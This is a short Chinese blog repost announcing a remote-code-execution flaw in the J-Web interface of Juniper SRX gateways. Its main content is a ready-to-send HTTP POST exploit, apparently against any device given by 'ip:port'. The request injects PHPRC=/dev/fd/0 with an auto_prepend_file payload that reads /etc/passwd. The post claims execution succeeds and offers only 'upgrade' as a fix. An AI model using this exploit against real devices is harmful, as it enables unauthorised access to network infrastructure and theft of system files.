某网络设备RCE漏洞(附EXP)

admin 2024年5月14日23:12:50评论8 views字数 719阅读2分23秒阅读模式

0x01 前言

瞻博网络 SRX 系列服务网关已预装瞻博网络 Junos 操作系统 (Junos OS)。J-Web 界面允许您通过默认情况下使用安全套接字层 HTTP (HTTPS) 启用的 Web 浏览器来监控、配置、故障排除和管理设备。该设备存在命令执行漏洞。
0x02 漏洞影响

    影响版本

Juniper SRX系列
0x03 漏洞利用

登录界面

某网络设备RCE漏洞(附EXP)

EXP:

POST /?PHPRC=/dev/fd/0 HTTP/1.1Host: ip:portSec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"Sec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ip:port/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 31auto_prepend_file="/etc/passwd"

命令执行成功!

某网络设备RCE漏洞(附EXP)

0x04 修复方案

请升级最新版本。 

原文始发于微信公众号(阿无安全):某网络设备RCE漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月14日23:12:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某网络设备RCE漏洞(附EXP)https://cn-sec.com/archives/2059047.html

发表评论

匿名网友 填写信息